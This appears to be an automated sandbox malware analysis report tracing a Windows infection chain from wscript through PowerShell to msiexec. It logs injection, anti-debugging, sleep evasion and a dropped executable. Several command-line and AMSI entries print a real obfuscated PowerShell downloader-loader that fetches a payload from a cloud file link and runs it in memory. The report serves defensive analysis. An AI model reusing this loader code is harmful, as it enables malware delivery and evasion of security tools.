                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3049164389.000000000704D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vind", "0")
                Source: Yara match File source: 00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Aabningsdag)$global:Vandrende = [System.Text.Encoding]::ASCII.GetString($Rabban)$global:Bondable=$Vandrende.substring($Woodlike,$Bullwhack)<#Elsdyrhoved Smatterer Lsningsalternativet
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Upassende $Fichuer $Reexpel), (Omkredsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blennorrhea = [AppDomain]::CurrentDomain.GetAssemblies()$global:Wh
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammenlgning)), $Detaljerer).DefineDynamicModule($Duad, $false).DefineType($Drearing, $Bibeloversttelse, [System.MulticastDelegate])$D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Aabningsdag)$global:Vandrende = [System.Text.Encoding]::ASCII.GetString($Rabban)$global:Bondable=$Vandrende.substring($Woodlike,$Bullwhack)<#Elsdyrhoved Smatterer Lsningsalternativet
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
                Source: 31437F.exe.7.dr Static PE information: section name: .didat
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D951F2 pushad ; iretd 2_2_00007FF848D952A9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D900BD pushad ; iretd 2_2_00007FF848D900C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848E65846 pushad ; ret 2_2_00007FF848E658E9
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BBF5D7 push cs; iretd 7_3_00BBF5D8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC49D3 push 00000078h; retf 7_3_00BC49D5
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BBFB3F push ds; retf 7_3_00BBFB40
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC1B43 push eax; iretd 7_3_00BC1B44
                Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5860
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3951
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6604
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3141
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6128 Thread sleep count: 5199 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1272 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 5199 delay: -5
                Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 60000
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2280020509.00000297EE1EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWeP
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
                Source: C:\Windows\SysWOW64\msiexec.exe Thread information set: HideFromDebugger
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0299DAAC LdrInitializeThunk,LdrInitializeThunk,5_2_0299DAAC

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: amsi64_5972.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 5972, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 5588, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2EC0000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 7EFDF4
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? 
dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? 
dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#daddy sabe kreprven hensttelsernes brnesengenes ribwort #>;$tiberius='forvokset';<#tangloppers vindroses klassesamarbejde atommissilernes mngderabattens #>;$bumblebeefishes=$host.privatedata;if ($bumblebeefishes) {$driftssikrere++;}function stratocumulus($udtagelsens){$variantens=$bibliopegistical+$udtagelsens.length-$driftssikrere;for( $presningers=5;$presningers -lt $variantens;$presningers+=6){$deanne+=$udtagelsens[$presningers];}$deanne;}function romancerne($amphiblestritis){ & ($perijove) ($amphiblestritis);}$termometeret=stratocumulus ' ,ivem grolob uffz,ndadimonotlb,ombl,akanaoverd/incom5klump.ojibw0 dest myelo(brevswandreigon pntogosdskraaobkkenw nblisquant .ldtancommetbly n skyde1chefa0bu fo. adri0 sand;inrad forewchaplifodern back6u.enf4 clum; atli detacxefte.6won s4vippe;t chn el oqrprog vcopub:fusio1,egra2u eff1 isje.ussel0synge) ssev out lgexpedetrinsc annk.nrepo prei/inten2str.t0 asth1butti0 ,nds0topta1themi0 blaa1 togs buks fleneni daasr reexeuvatefggekaoqrparxpert / tred1kurs.2 bifi1 anxi.fleck0g obo ';$redaktionernes=stratocumulus 'b lfauselv ssubmieankler mis,-skrifasnes,gdisgaeudviknste,etudst, ';$coadjuvant=stratocumulus ' uncoh studt aroktvagttpstares h po:s bcl/ rang/inevidbuglorunconio twavbemuze.rlle.asbesgbrighodepreordsptgprocrlsal mekej e.arrtecvandiolabormsyre / prinuopistcbarse? 
dyspecasquxbr tipeks mo lter formtde ik= placdsy,cooraneewtilgandu,sllplaneoenr qaid oldcrean&unthoima sedforst= hono1 ferr1unbarzchondm undezboxcaz weinw sinnhordkl9ungarhlecanutekstcvermunpropektabul5en ed3crapaaudslagprepaferasjrgtepabforbrfstemm7py opxnonpai are f st.inanticf barbq fre.8tuberbs ubh_ to subikin ';$tarnal=stratocumulus 'abbre> mayw ';$perijove=stratocumulus 'ele.tipostoev,jlex ddor ';$hovedmandens='galenes';$sabuja='\tavell.vrd';romancerne (stratocumulus 'un er$weekegafspal foreocoltsbdowsaazon il bla : mysklprceduglycek hjlpstekstugdni sproskvsophrrbartoefraxilpolytsinkw,e unrertrucknincive folk= e gr$amanie puren bundvsupe :tr kna sodapfictipteachd rseagenertmngdea pri +stoer$invassb rgeastt.ebtieleupterojservia ,rol ');romancerne (stratocumulus 'therm$sharegcatallgrundoamatrbdoed.a perilskr,a:reignkaureanh nnra urinl aandd erniestrubnyogeed udsmefatte=r tin$surmec kommodit aale igdafv kj encau sidsvskovfatelt,n,pkalt hopk.omdiss ,laepflle ltusseiange.tgen e(tide,$kopist can avarslrimpasnforgaa.ystelformu)vurde ');romancerne (stratocumulus 'amfib[loca nandenehokest endi. orges egnie firer uadvmasseiraviscrrlggewagglp oninooctadi sne nkaut tsubtem postapushen gascaf ikkginvole chroraflnn]hrels:c bal:tilstsregreeragascbraveunglefrsubeli featthypobysheucplystfroverfononhatkamgaocarpecshuddostruklhirud fl.ed=sunga wint[bedk,nrhamneskridtasc r.zoarcstaareetra scsceneukalatrw.stoielvbrtforeryoveripamb,vretymoo.yanitsodleo b ofcunifaocy thlkonfet dngeydambrppr toetingl]dyb r:pr pe: fo.ft gstflvoldts Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
